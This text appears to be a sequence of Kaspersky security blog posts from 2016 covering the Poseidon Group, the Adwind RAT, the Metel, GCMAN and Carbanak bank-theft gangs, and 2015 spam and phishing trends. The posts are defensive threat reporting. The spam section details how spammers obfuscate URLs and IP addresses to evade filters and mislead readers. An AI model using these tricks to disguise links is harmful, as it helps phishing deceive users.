Poseidon Group has interesting practices when it comes to its use of command and control servers, including redundancies and quickly discarding command and control (C&Cs) servers after specific campaigns. This has actually allowed us to sinkhole several domains. A few of these still had active infections attempting to report to the C&Cs. This adds an interesting dimension to the story. As part of Kaspersky Lab’s commitment to securing cyberspace for everyone, we reached out and notified identifiable victims, regardless of their security solution and provided them with indicators of compromise (IOCs) to help root out the active infection. In the process, we were able to confirm the previously described operating procedures for the Poseidon Group.

Is this a state-sponsored attack? Who is responsible?

We do not believe this to be a state-sponsored attack but rather a commercial threat player. Collaboration with information-sharing partners and victim institutions allowed us to become aware of the more complicated business cycle involved in this story, greatly adding to our research interest in tracking these campaigns. The malware is designed to function specifically on English and Portuguese-language systems. This is the first ever Portuguese-speaking targeted attack campaign.

How long have the attackers been active?

The attackers have been active for more than ten years. The main distribution of samples goes back to 2005 with possible earlier outliers.

Operating systems such as Windows 95 for desktop computers and Windows NT for server editions were not uncommon at the time and Poseidon’s team has evolved gradually into targeting the latest flagship editions of Microsoft’s operating systems. Recent samples show interest in Windows 2012 Server and Windows 8.1.

Did the attackers use any interesting/advanced technologies?

During a particular campaign, conventional Poseidon samples were directed to IPs resolving to satellite uplinks. The networks abused were designed for internet communications with ships at sea which span a greater geographical area at nearly global scale, while providing nearly no security for their downlinks.

The malware authors also possess an interesting understanding of execution policies which they leverage to manipulate their victim systems. They combine reconnaissance of GPO (Group Policy Object management for execution) with digitally-signed malware to avoid detection or blocking during their infection phases. These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders.

Does Kaspersky Lab detect all variants of this malware?

Yes, all samples are detected by signatures and also heuristics. With a fully updated Kaspersky Lab anti-malware solution, all customers are protected now. Kaspersky Lab products detect the malware used by Poseidon Group with the following detection names:

Backdoor.Win32.Nhopro
HEUR:Backdoor.Win32.Nhopro.gen
HEUR:Hacktool.Win32.Nhopro.gen

How many victims have you found?

At least 35 victim companies have been identified with primary targets including financial and government institutions, telecommunications, manufacturing, energy and other service utility companies, as well as media and public relations firms.

The archaeological effort of understanding such a long-standing group can severely complicate victim identification. We see traces of upwards of a few tens of companies targeted. The exact number of the victims may actually vary. Since it is a very long term group, some victims may be impossible to identify now.

At this time, we are reaching out to victims of active infections to offer remediation assistance, IOCs, and our full intelligence report to help them counteract this threat. Any victims or potential targets concerned about this threat should please contact us at intelreports@kaspersky.com.

Who is behind these attacks?

We do not speculate on attribution. Language code used to compile implants, as well as the language used to describe certain commands used by the group, actually corresponds to Portuguese from Brazil. The inclusion of Portuguese language strings and preference for Portuguese systems is prominent throughout the samples.

The tasking of Poseidon’s campaigns appears to be heavily focused on espionage for commercial interests. Speculating further would be unsubstantiated.

For more about counter Poseidon and similar attacks, read this article in the Kaspersky Business Blog.

Adwind: FAQ

Malware Alerts - Mon, 02/08/2016 - 10:38

Download full report PDF

We have become aware of unusual malware that was found in some banks in Singapore. This malware has many names – it is known as Adwind RAT (Remote Access Tool), AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is a backdoor available for purchase, and is written entirely in Java which makes it cross-platform. According to the author, the backdoor component (called the server) can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

While it is mostly used by opportunistic attackers and distributed in massive spam campaigns there are indications that some of the Adwind samples were used in targeted attacks. In August 2015 AlienSpy popped up in the news related to cyber-espionage against an Argentinian prosecutor who was found dead in January 2015.

#Adwind RAT is an unusual #Java backdoor that was found in some banks in #Singapore #TheSAS2016

Tweet

The malware sample we received was sent by email to some banks in Singapore on behalf of a major Malaysian bank. The IP address of the e-mail senders points to a server in Romania while the mail server and account used belong to a company located in Russia.

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. The malware program operates by sending out system information and accepting commands from a remote attacker. These commands can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. A significant amount of additional functionality can be provided through downloadable plugins, including such things as remote control options and shell command execution.

We would like to encourage enterprises to review the purpose of using a Java platform and to disable it for all unauthorized sources.

What exactly is Adwind?

Adwind is a cross-platform, multifunctional backdoor, which can run on Windows, Mac OS, Linux and Android OS.

Is this a nation-state sponsored campaign?

This is not a nation-state sponsored campaign. We believe that it was developed and used mostly by cybercriminals.

Who are the victims? / What can you say about the targets of the attacks?

The victims range from random people that launched the malware following an opportunistic attack to specific organizations, most of which are small and medium-sized businesses.

How did you become aware of this threat? Who reported it?

From one of our partners we received part of an email with a .JAR attachment. The profile of the partner company and the contents of the email indicated a targeted attack attempt. While the partner was not compromised we decided to check the attachment, which led us to the malware platform.

How does Adwind infect computers?

Adwind doesn’t self-infect computers or spread automatically. It relies on user interaction: double-clicking the .JAR attachment in the email or doing the same from an archive. Alternatively, it can be spread via other containers like .hta or .vbs files, which install Java if it’s not available on the system and download the main Adwind.JAR file from a remote server.

Are the attackers using any zero-day vulnerabilities?

We have not seen attackers using zero-day vulnerabilities together with Adwind.

What exactly is being stolen from the target machines?

Limited only by the intelligence needs of the attackers, the malware can:

  • collect keystrokes
  • steal cached passwords and grab data from web forms
  • take screenshots
  • take pictures and record video from the webcam
  • record sound from the microphone
  • transfer files
  • collect general system and user information
  • steal keys for cryptocurrency wallets
  • manage SMS (for Android)
  • steals VPN certificates
Is this a Windows-only threat? Which versions of Windows are targeted? Are there Mac OS X or Linux variants?

This malware is capable of running on any platform that has a modern Java runtime environment installed, which includes all Java-supported versions of Windows, Mac OS X, Linux and potentially other platforms which run Java.

Have you seen any evidence of a mobile component – iOS, Android or BlackBerry?

We have seen Adwind .apk files that can run on Android OS, however iOS and BlackBerry are out of the scope of this platform.

It seems Adwind is all about Java. Why do you think it is so?

Java applications by design should be platform independent. While certain system architectures are quite specific and there is a set of Java libraries designed for them, general purpose code may run on any system that has a Java runtime environment installed. This makes Java a very convenient platform for which to develop malware that can run on any platform.

Do you know the total number of victims?

We have our own estimate of targets attacked by this malware. It is more than 443,000 covering the period from 2013 to the beginning of 2016.

What is the geography of victims?

The geography of victims changed over time. In 2013, Arabic and Spanish-speaking countries were the top targets. In 2014, the most attacked countries were Turkey and India, followed by UAE, the US and Vietnam. In 2015, Russia was the most attacked country, with UAE and Turkey again near the top, along with the USA, Turkey and Germany.

What are the attacked industries?

During their investigation the Kaspersky Lab researchers were able to analyze nearly 200 examples of spear-phishing attacks organized by unknown criminals to spread the Adwind malware, and were able to identify the industries most of the targets worked in:

  • Manufacturing
  • Finance
  • Engineering
  • Design
  • Retail
  • Government
  • Shipping
  • Telecom
  • Software
  • Education
  • Food production
  • Healthcare
  • Media
  • Energy

Based on information from Kaspersky Security Network, the 200 examples of spear-phishing attacks observed in the six months between August 2015 and January 2016 resulted in Adwind RAT malware samples being encountered by more than 68,000 users.

Who are the clients of Adwind? Where are they from? How many? Are they APT actors?

To begin with, Adwind only had a Spanish interface; however it now also has an English interface and is recognized by cybercriminals from many countries. We believe that clients of the Adwind platform fall into the following categories:

  1. Scammers that want to move to the next level (using malware for more advanced fraud)
  2. Unfair competitors
  3. Cyber-mercenaries (spies for hire)
  4. Private individuals that want to spy on people they know
How is this different from any other APT attack?

Adwind is not an APT attack. It is a platform with rich capabilities that cybercriminals can use to conduct cyber-espionage.

Are there multiple variants of Adwind? Are there any major differences in the variants?

There have been multiple generations of Adwind, which has been continuously developed and supported since at least 2012. The differences are mostly about malware features and available modules, however all variants rely on the same basic scheme of client-server communication. It’s designed to send commands in an ad-hoc manner, which introduces a constraint of controlling a large number of compromised machines. We believe that it’s not suitable for even medium-sized botnets and used only for targeted network penetrations.

Is the command-and-control servers used by Adwind still active? Have you been able to sinkhole any of the C&Cs?

The Adwind malware is used by hundreds of criminals, which means that there are hundreds of command and control servers. Some of them are down, some are up, the others are turned on as required. It’s not easy and not efficient to take them down in the traditional way. Most of them rely on free Dynamic DNS providers and are not real domain registrations.

Who is responsible for this threat?

We cannot speculate publically about attribution.

How long have the attackers been active?

The users of Adwind malware have been active since at least 2012 with a large spike of users at the end of 2015.

Did the attackers use any interesting/advanced technologies?

Generally speaking, the Java platform is not a common platform for malware at all. It is mainly related to the requirement of having a Java runtime environment on the victim’s system, the size of the generated code and availability of decompilers for Java classes. The author of the Adwind malware attempted to solve all these problems by introducing a number of workarounds.

Does Kaspersky Lab detect all variants of this malware?

Kaspersky Lab products detect all variants of this malware that we know about. The full list is available in the Appendix of our public report.

Are there Indicators of Compromise (IOCs) to help victims identify the intrusion?

Yes, there are many known domains and IP addresses used by the Adwind attackers. The full list is available in the Appendix of our public report.

What is JSocket? How long does it exist?

JSocket is the latest reincarnation of Adwind RAT, and available through online subscription. It was launched in June 2015 and is still running.

What is the problem with just interrupting the JSocket service?

Interrupting the service by suspending the domain or taking down the server wasn’t efficient in the past and led to yet another rebranding and restart of the platform.

What is the difference between JSocket and Adwind?

The Adwind RAT and the JSocket RAT are based on the same source code and were most likely developed by the same author. While Adwind was abandoned some time ago, JSocket still exists and is just another “brand” of the same RAT. As JSocket is the latest variant of the backdoor it has many more features and a rebuilt UI.

How many people you think are behind the whole MaaS platform?

We believe that the platform is in the hands of just one hardworking individual, who sometimes outsources tasks to external developers.

You estimated the revenue of the whole service as 200k per year. How did you calculate this figure?

Based on users’ activity on the internal message board and some other observations, we estimated a number of users in the system as 1,800 by the end of 2015. By making certain assumptions on the percentage of paid accounts, service costs and most probable distribution of the paid customers, we concluded that such a service may generate up to $200K USD annually. However, this is just an estimation of revenue, which doesn’t necessarily mean that the author has already received this money. One important fact is that the latest version of the portal was launched only in summer 2015.

Have you reported your findings to LEA? What was the outcome?

We believe that reporting to Law Enforcement is the best way to combat cybercrime. Yes, we have reported the case of the attempted computer attack which we investigated in depth from the very beginning, based on information provided by our research partner. The information was received but apparently it takes time to verify and process such reports to start an investigation. The reporter doesn’t normally get an update from a police investigation, with the exception of requests for some additional information.

To find out more about withstanding Adwind-based attacks, read this article in the Kaspersky Business Blog.

For any inquiries, please contact intelreports@kaspersky.com

APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks

Malware Alerts - Mon, 02/08/2016 - 08:20

Introduction

In late 2014, Kaspersky Lab researchers made a worrying prediction: financially-motivated cyber-criminals would adopt sophisticated tactics and techniques from APT groups for use in bank robberies.

Just a few months later, in February 2015, we announced the discovery of Carbanak, a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries.

Since then, we have seen an increase in these covert, APT-style attacks that combine the use of reconnaissance, social engineering, specialized malware, lateral movement tools and long-term persistence to steal money from financial institutions (particularly ATMs and money transfer systems).

In summer 2015, a #bank in #Russia lost millions of rubles in a one night #bankingAPT #TheSAS2016

Tweet

Today at the Security Analyst Summit (SAS 2016), Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights.

In 2015, Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups.

Due to the active nature of law enforcement investigations and non-disclosure agreements with victim organizations, Kaspersky Lab cannot provide extensive details of the attacks. Kaspersky Lab is releasing crucial Indicators of Compromise (IOC) and other data to help organizations search for traces of these attack groups in their corporate networks (see below).

The story of Metel – ATM balance rollbacks

In summer 2015, a bank in Russia discovered it had lost millions of rubles in a single night through a series of strange financial transactions. The bank’s clients were making withdrawals from ATMs belonging to other banks and were able to cash out huge sums of money while their balances remained untouched. The victim bank didn’t realize this until it tried to recoup the money withdrawn from the other banks’ ATMs.

During our incident response, we discovered the solution to this puzzle: Metel, a modular malware program also known as Corkow.

The malware, used exclusively by the Metel group, infected the bank’s corporate network via e-mail and moved laterally to gain access to the computers within the bank’s IT systems.

Having gained access to the bank operator’s money-processing system, the gang pulled off a clever trick by automating the rollback of ATM transactions. This meant that money could be stolen from ATM machines via debit cards while the balance on the cards remained the same, allowing for multiple transactions at different ATM machines.

Encrypted configuration for Metel malware plugins

Our investigations revealed that the attackers drove around several cities in Russia, stealing money from ATMs belonging to different banks. With the automated rollback in place the money was instantly returned to the account after the cash had been dispensed from the ATM. The group worked exclusively at night, emptying ATM cassettes at several locations.

GCMAN group planted cron script into #bank server, stealing $200/min #bankingAPT #TheSAS2016

Tweet

In all, we discovered Metel in more than 30 financial institutions, but Kaspersky Lab’s incident responders were able to clean the networks before any major damage could be done. It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware.

The Metel criminal group is still active. At the moment, we don’t have any information about any victims outside Russia.

GCMAN – penetration testing tools gone bad

A second group, which we call GCMAN because the malware is based on code compiled on the GCC compiler, emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services.

The initial infection mechanism is handled by spear-phishing financial institution targets with e-mails carrying a malicious RAR archive to. Upon opening the RAR archive, an executable is started instead of a Microsoft Word document, resulting in infection.

Once inside the network, the GCMAN group uses legitimate and penetration testing tools such as Putty, VNC, and Meterpreter for lateral movement. Our investigation revealed an attack where the group then planted a cron script into bank’s server, sending financial transactions at the rate of $200 per minute. A time-based scheduler was invoking the script every minute to post new transactions directly to upstream payment processing system. This allowed the group to transfer money to multiple e-currency services without these transactions being reported to any system inside the bank.

Decompiled code of GCMAN malware that is responsible for connecting to CnC

In a stroke of luck, the financial institutions discovered the suspicious activity on their network in time to neutralize the threat and cancel the transactions.

One interesting observation is that the real attack happened approximately 18 months before it was discovered. The group used an MS SQL injection in commercial software running on one of bank’s public web services, and about a year and a half later, they came back to cash out. During that time they poked 70 internal hosts, compromised 56 accounts, making their way from 139 attack sources (TOR and compromised home routers).

We discovered that about two months before the incident someone was trying different passwords for an admin account on a banking server. They were really persistent but doing it only three times a week and then only on Saturdays, in an effort to stay under the radar.

Kaspersky Lab’s research team responded to three financial institutions in Russia that were infected with the GCMAN malware. It is likely that this threat is far more widespread and we urge banks to sweep their networks for signs of this cyber-criminal group.

Carbanak 2.0: new targets beyond banks

After our exposure of the Carbanak group exactly a year ago, the group disappeared for about five months, leading us to believe that the operation was disbanded. However, in September last year, our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers.

In December 2015, we confirmed that the group was still active. Kaspersky Lab discovered signs of Carbanak in two institutions – a telecommunications company and a financial institution.

Executable files founded in SHIM during Carbanak incident response

One interesting characteristic of Carbanak 2.0 is a different victim profile. The group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them, using the same APT-style tools and techniques.

In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs. It’s unclear how they wanted to make use of this information in future.

#Carbanak gang is now targeting budgeting & accounting departments #bankingAPT #TheSAS2016

Tweet

Kaspersky Lab products successfully detect and block the malware used by the Carbanak 2.0, Metel and GCMAN threat actors with the following detection names:

  • Trojan-Dropper.Win32.Metel
  • Backdoor.Win32.Metel
  • Trojan-Banker.Win32.Metel
  • Backdoor.Win32.GCMan
  • Backdoor.Win64.GCMan
  • Trojan-Downloader.Win32.GCMan
  • Trojan-Downloader.Win32.Carbanak
  • Backdoor.Win32.Carbanak

Kaspersky Lab urges all organizations to carefully scan their networks for the presence of Carbanak, Metel and GCMAN and, if detected, to disinfect their systems/computers/networks and report the intrusion to law enforcement.

All this information has been made available to customers of our APT intelligence reporting service and they received the indicators of compromise and context information as soon as they became available.

Indicators of Compromise (IOC) are available here:
Metel
GCMAN
Carbanak 2.0

For more about the measures to be taken against these Bank Busters and similar offensives, read this article in the Kaspersky Business Blog.

Social Media Wall: TheSAS2016

Malware Alerts - Mon, 02/08/2016 - 01:45

Kaspersky Security Bulletin. Spam and phishing in 2015

Malware Alerts - Fri, 02/05/2016 - 05:58

The year in figures

According to Kaspersky Lab, in 2015

  • The proportion of spam in email flows was 55.28%, which is 11.48 percentage points lower than in 2014.
  • 79% of spam emails were no more than 2 KB in size.
  • 15.2% of spam was sent from the US.
  • 146,692,256 instances that triggered the ‘Antiphishing’ system were recorded.
  • Russia suffered the highest number of phishing attacks, with 17.8% of the global total.
  • Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers.
  • 34.33% of phishing attacks targeted online financial organizations (banks, payment systems and online stores).
New domain zones in spam

In early 2015, we registered a surge in the number of new top-level domains used for distributing mass mailings. This was caused by the growth in interest among spammers for the New gTLD program launched in 2014. The main aim of this program is to provide organizations with the opportunity to choose a domain zone that is consistent with their activities and the themes of their sites. The business opportunities provided by New gTLD were enthusiastically endorsed by the Internet community, and active registration of new domain names is still ongoing.

In 2015, proportion of #spam was 55.28% down from 66.76% in 2014 #KLReport

Tweet

However, new domain zones almost immediately became an arena for the large-scale distribution of spam, as cybercriminals registered domains to spread mass mailings. At first, there was some logical connection between the theme of the spam and the domain name, but this changed as the year went on and the domain names used in mass mailings were, on the whole, not related to the subject of the spam. However, even now we still come across isolated cases where the connection is noticeable. For example, online dating sites are often placed in the .date zone.

This lack of any connection between the domain name and spam theme was mainly caused by the cost of new domains. The attackers try to choose the cheapest possible hosting because the sites will often be used just once for a specific spam mass mailing, so the domain name does not play a major role. Instead, the deciding factors tend to be the cost of the domains and the discounts that small registrars are willing to provide for bulk purchases.

Spammer tricks: methods for expressing domain names

Scammers try to make every email unique in order to bypass mass filtering and complicate the work of content filters. It is quite easy to make each text different by using similar characters from other alphabets, or by changing the word and sentence order, etc. But there is always the address of the spammer site – it can’t be changed so easily, and the whole point of sending out spam is for users to click a link to the advertised site. Over the years, spammers have come up with numerous ways to hide the spammer site from anti-spam filters: redirects to hacked sites, generation of unique links to short URL services, the use of popular cloud services as redirects, etc.

In 2015, 79% of spam emails were less than 2 KB in size #KLReport

Tweet

In 2015, in addition to the methods mentioned above, spammers also focused on ways of expressing domain names and IP addresses. Here we take a closer look at these tricks by studying examples taken from a variety of spam messages.

Special features of the IP protocol: different IP formats

The standard method of writing IP addresses IPv4 is the dotted-decimal format where the value of each byte is given as a decimal number from 0 to 255, and each byte is separated by a dot. However, there are other formats that browsers will interpret correctly. These are binary, octal, hexadecimal formats, and the format dword/Undotted Integer when every IP byte is first converted to a hexadecimal format, then all the bytes are written in one number in the order they were written in the IP address, and then this number is converted into the decimal system. All these formats can be combined by writing each part of the IP in a different way, and the browser will still interpret it correctly!

These techniques are exploited by spammers. They write the same IP addresses in many different ways, including the method of combining different formats:

  • oct – hex

  • oct – dword

  • hex – dword

Addresses in hexadecimal format can be written with and without dots separating the numbers:

Additionally, 4294967296 (256*4) can be added any number of times to the number in the Integer format, and the result will still be interpreted as the same IP address.

In 2015, 15.2% of spam was sent from the US #KLReport

Tweet

In the decimal format, the number 256 can be added to each part of the IP address any amount of times – as long as there is a three-digit result, the address will be interpreted correctly.

In the octal format, any number of leading zeros can be added to the IP address, and it will remain valid:

You can also insert any number of forward slashes in the address:

Although in some legal libraries IP addresses can be stored in different formats, it is prohibited to use any format other than the standard dotted-decimal in the URL (i.e., in the links being referred to).

Obfuscation of an IP address, or how many ways can a number be written in Unicode

We have already written about the obfuscation of key words in spam using various Unicode ranges.

The same tricks can be applied when writing IP addresses and domain names. With regards to an IP, in 2015 spammers often used Unicode numbers from the so-called full-size range. Normally, it is used with hieroglyphic languages so that Latin letters and numbers do not look too small and narrow compared to the hieroglyphics.

We also came across figures from other ranges – figures in a circle, figures that are underscored, etc.:

Obfuscation of domains

As mentioned above, this trick also works with domains. Unicode has even more letter ranges than numerical. Spammers often used multiple ranges in a single link (changing them randomly in every email, thereby increasing the variability within a single mass mailing).

To make the links even more unique, rather than obfuscating the spammer site itself the scammers obfuscated short URL services where the links to the main site were generated in large quantities:

Interpreting URL symbols

URLs contain special symbols that spammers use to add ‘noise’. Primarily, it is the @ symbol which is intended for user authentication on the site. A link such as http://login:password@domain.com means that the user wants to enter the site domain.com using a specific username (login) and password. If the site does not require authentication, everything that precedes the @ symbol, will simply be ignored. We came across mass mailings where spammers simply inserted the @ symbol in front of the domain name and mass mailings where the @ symbol was preceded with a random (or non-random) sequence:

It is interesting that this technique was used to obfuscate links; that is usually the prerogative of phishers. This method of presenting URLs can be used by fraudsters to trick users into thinking that a link leads to a legitimate site. For example, in the link http://google.com@spamdomain.com/anything the domain that the browser accepts is spamdomain.com, not google.com. However, in order to trick users, spammers have used another domain-related technique: they registered lots of domains beginning with com-. With third-level domains the links in emails looked like this: http://learnmore.com-eurekastep.eu/find

If you don’t look carefully, you might think that the main domain is learnmore.com, whereas it is in fact com-eurekastep.eu.

In addition to the @ symbol, scammers filled links with other symbols: www.goo&zwj.g&zwjl/0Gsylm.

For example, in the case above the “&zwj” fragment in the goo.gl domain has been inserted randomly in different parts of the domain making the link unique in each email. This insertion is called a zero-width joiner; it is used to combine several individual symbols in the Hindi languages as well as emoticons in one symbol. Within the domain, it obviously carries no semantic meaning; it simply obfuscates the link.

Yet another method of obscuring links is the use of a “soft hyphen” (SHY). In HTML, SHY is a special symbol that is not visible in the text, but if a word containing a special symbol doesn’t fit in at the end of a line, the part after the special symbol is moved to the next line, while a hyphen is added to the first part. Typically, browsers and email clients ignore this symbol inside links, so spammers can embed it anywhere in a URL and as often as they like. We came across a mass mailing where soft hyphens had been inserted in the domain more than 200 times (hexadecimal encoding):

As well as the soft hyphen there are other special symbols used in domains – the sequence indicator (& ordm;), the superscripts 1 and 2 (& sup1 ;, & sup2;) – that can be interpreted by some browsers as the letter “o” and the figures “1” and “2” respectively.

Reiteration of a popular domain name

Another original way of adding noise to links used by spammers in 2015 was the use of a well-known domain as a redirect. This trick is not new, but this time the fraudsters added the same well-known domain several times:

Emails without a URL

It is also worth mentioning those cases where no domains were used at all. Instead of a URL, a number of spam mailings contained a QR-code.

Other mass mailings prompted the user to enter a random sequence in a search engine; the link to the site appeared at the top of the search results:

World events in spam

The next Olympic Games in Brazil only take place in the summer of 2016, but already in 2015 fraudulent notifications of lottery wins dedicated to this popular sporting event were being registered. These included emails containing an attached PDF file that informed recipients that their address had been randomly selected out of millions of email addresses. In order to claim the prize it was necessary to respond to the email and provide specific personal information. In addition to the text, the attachments contained different graphical elements (logos, photos, etc.). The fake lottery win notifications, which were of a considerable length, were often sent out with attachments to bypass spam filtering.

In 2015, ‘Nigerian’ scammers exploited political events in Ukraine, the war in Syria, the presidential elections in Nigeria and earthquake in Nepal to convince recipients that their stories were genuine. The authors primarily sought help to invest huge sums of money or asked for financial assistance. These so-called Nigerian letters made use of the customary tricks to deceive recipients and extort money from them.

Emails about the war in Syria often mentioned refugees and Syrian citizens seeking asylum in Europe. Some emails were made to look as if they had been sent directly from refugee camps and contained complaints about the poor conditions.

Statistics Proportion of spam in email traffic

In 2015, the proportion of spam in email traffic was 55.28%, which is 11.48 percentage points lower than the previous year.

The proportion of spam in email traffic, 2015

The most noticeable drop was registered in the first months of 2015 – from 61.86% in January to 53.63% in April. The fluctuations throughout the rest of the year were inconsiderable – within 1-2 percentage points.

Sources of spam by country

Sources of spam by country, 2015

In 2015, there was a slight change to the top three sources of spam: China (6.12%) dropped to fourth although the proportion of spam distributed from that country actually increased by 0.59 percentage points. Replacing it in third place was Vietnam (6.13%), which saw 1.92 percentage points added to its share. Russia (6.15%) remained in second place with an increase of 0.22 percentage points, while the US (15.16%) remained the undisputed leader despite a decrease of 1.5 percentage points.

In 2015, users in USA were targeted by 4.92% of worldwide malicious emails #KLReport

Tweet

As was the case in 2014 Germany came fifth (4.24%), with its contribution increasing by 0.24 percentage points. The rest of the Top 10 consisted of Ukraine (3.99%, +0.99 p.p.), France (3.17%, +0.62 p.p.), India (2.96%, no change), Argentina (2.90%, -0.65 p.p.) and Brazil (2.85%, +0.42 p.p.).

The size of spam emails

The size of spam emails in 2015

The proportion of super-short spam emails (under 2 KB) grew in 2015 and averaged 77.26%, while the share of emails sized 2-5 KB fell to 9.08%. The general trend of 2015 was a reduction in the size of emails.

Malicious attachments in email

The Top 10 malicious programs spread by email in 2015

The notorious Trojan-Spy.HTML.Fraud.gen remained the most popular malicious program sent by email. This program is a fake HTML page sent via email that imitates an important notification from a large commercial bank, online store, or software developer, etc. This threat appears as an HTML phishing website where a user has to enter his personal data, which is then forwarded to cybercriminals.

Trojan-Downloader.HTML.Agent.aax was in second, while ninth and tenth positions were occupied by Trojan-Downloader.HTML.Meta.as. and Trojan-Downloader.HTML.Meta.ay respectively. All three are HTML pages that, when opened by users, redirect them to a malicious site. Once there, a victim usually encounters a phishing page or is offered a download – Binbot, a binary option trading bot. These malicious programs spread via email attachments and the only difference between them is the link that redirects users to the rigged sites.

Third was Trojan-Banker.Win32.ChePro.ink. This downloader is a CPL applet (a Control Panel component) that downloads Trojans designed to steal confidential financial information. Most malicious programs of this type are aimed at Brazilian and Portuguese banks.

Email-Worm.Win32.Mydoom.l was in fourth place. This network worm spreads as an email attachment via file-sharing services and writable network resources. It harvests email addresses from infected computers so they can be used for further mass mailings. To send the email, the worm directly connects to the SMTP server of the recipient.

Next came Trojan.JS.Agent.csz and Trojan-Downloader.JS.Agent.hhi, which are downloaders written in JavaScript. These malicious programs may contain several addresses (domains) which the infected computer consecutively calls. If the call is successful, a malicious EXE file is downloaded in the temp folder and run.

Trojan-PSW.Win32.Fareit.auqm was in eighth position. Fareit Trojans steal browser cookies and passwords from FTP clients and email programs and then send the data to a remote server run by cybercriminals.

Malware families

Throughout the year, Upatre remained the most widespread malware family. Malware from this family downloads the Trojan banker known as Dyre/Dyreza/Dyzap.

MSWord.Agent and VBS.Agent occupied second and third places respectively. To recap, these malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA), which runs on opening the document. It downloads and runs other malware, such as Andromeda.VBS.Agent. As the name suggests, it uses the embedded VBS script. To download and run other malware on the user’s computer the malicious programs of this family utilize the ADODB.Stream technology.

The Andromeda family came fourth. These programs allow the attackers to secretly control infected computers, which often become part of a botnet. Noticeably, in 2014 Andromeda topped the rating of the most widespread malware families.

In 2015, #Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers #KLReport

Tweet

The Zbot family came fifth. Representatives of this family are designed to carry out attacks on servers and user computers, and also for capturing data. Although ZeuS/Zbot is capable of carrying out various harmful actions, it is most often used to steal banking information.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, 2015

For the previous three years, the Top 3 countries most often targeted by mailshots has remained unchanged – the US, the UK and Germany. However, in 2015, spammers altered their tactics and targets. As a result, Germany came first (19.06%, +9.84 p.p.) followed by Brazil (7.64%, +4.09 p.p.), which was only sixth in 2014.

The biggest surprise in Q3, and the whole of 2015, was Russia’s rise to third place (6.30%, +3.06 p.p.). To recap, in 2014 Russia was ranked eighth with no more than 3.24% of all malicious spam being sent to the country.

We would like to believe that despite the trend seen in recent quarters, the number of malicious mass mailings sent to Russia will decrease. As for the total number of malicious attachments sent via email, their number is likely to grow in 2016 and the theft of personal information and Trojan ransomware will occupy the top places.

Special features of malicious spam

In spam traffic for 2015 we registered a burst of mass mailings with macro viruses. The majority of emails containing macro viruses in Q1 were sent in attachments with a .doc or .xls extension and belonged to the Trojan downloader category designed to download other malicious programs.

As a rule, the malicious attachments imitated various financial documents: notifications about fines or money transfers, unpaid bills, payments, complaints, e-tickets, etc. They were often sent on behalf of employees from real companies and organizations.

In 2015, 34.33% of phishing attacks targeted clients of financial organizations #KLReport #banking

Tweet

The danger posed by macro viruses is not restricted to their availability and ease of creation. A macro virus can infect not only the document that is opened initially but also a global macro common to all similar documents and consequently all the user’s documents that use global macros. Moreover, the VBA language is sufficiently functional to be used for writing malicious code of all kinds.

In 2015, cybercriminals specializing in malicious spam continued to distribute malware in non-standard archive formats (.cab, .ace, .7z, .z, .gz). These formats were introduced long ago and are used by specialists in software development and installation, but they are largely unknown to ordinary users, unlike ZIP and RAR. Another difference is the high degree of file compression, which is used to reduce email sizes to a minimum and bypass spam filtering. These malicious archives were passed off as a variety of attachments (orders, invoices, photographs, reports, etc.) and contained different malicious programs (Trojan-Downloader.Win32.Cabby, Trojan-Downloader.VBS.Agent.azx, Trojan-Spy.Win32.Zbot .iuk, HawkEye Keylogger, etc.). The vast majority of emails were in English, though there were messages in other languages.

In 2014, cybercriminals were particularly active in sending out fake emails from mobile devices and notifications from mobile apps containing malware and adverts. In 2015, the mobile theme continued: malicious programs were distributed in the form of .apk and .jar files, which are in fact archived executable application files for mobile devices. Files with the .jar extension are usually ZIP archives containing a program in Java, and they are primarily intended to be launched from a mobile phone, while .apk files are used to install applications on Android.

In particular, cybercriminals masked the mobile encryption Trojan SLocker behind a file containing updates for Flash Player: when run, it encrypts images, documents and video files stored on the device. After launching, a message is displayed telling the user to pay a fee in order to decrypt his files. Another .jar archive contained Backdoor.Adwind written in Java. This multi-platform malicious program can be installed not only on mobile devices but also on Windows, Mac and Linux.

The attackers who send out malware in files for mobile devices are most probably hoping that recipients using email on a mobile device will install the malicious attachment.

With every year, cybercriminals are becoming more interested in mobile devices. This is primarily due to the constant increase in activity by mobile users (using messengers and other methods of exchanging data) and the migration of different services (e.g., financial transactions) to mobile platforms, and of course, one user may have several mobile devices. Secondly, it is due to the emergence of various popular apps that can be used by cybercriminals both directly (for sending out spam, including malicious spam) and indirectly (in phishing emails). For example, users of the popular messenger WhatsApp fall victim to not only traditional advertising spam but also virus writers. Mobile users should be especially careful because cybercriminal activity in this sphere is only likely to increase.

Phishing Main trends

In 2015, the Anti-Phishing system was triggered 148,395,446 times on computers of Kaspersky Lab users. 60% (89,947,439) of those incidents were blocked by deterministic components and 40% (58,448,007) by heuristic detection components.

Methods of distributing phishing content

The methods used by cybercriminals to spread phishing content have long gone beyond the framework of email clients. For example, one of the most popular ways of distributing phishing pages is pop-up ads. In 2015, we came across a variety of fraudulent schemes utilizing this simple trick: the fake page automatically opens in the browser when a user visits certain sites, including legitimate ones, but uses pop-up advertising.

Cybercriminals used this technique to attack customers of Russian banks in the third and fourth quarters of 2015.

The fraudulent page to which the victim is redirected by a pop-up advert

